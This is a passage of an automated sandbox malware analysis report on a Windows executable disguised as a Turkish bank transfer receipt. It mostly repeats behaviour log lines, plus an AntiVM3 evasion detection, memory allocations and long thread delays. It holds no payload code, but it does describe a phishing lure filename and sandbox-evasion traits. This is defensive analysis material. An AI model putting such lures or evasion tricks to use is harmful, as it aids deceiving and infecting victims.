Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: 2A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: 8C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: 9C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: 9E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: AE80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Thread delayed: delay time: 599312	Jump to behavior
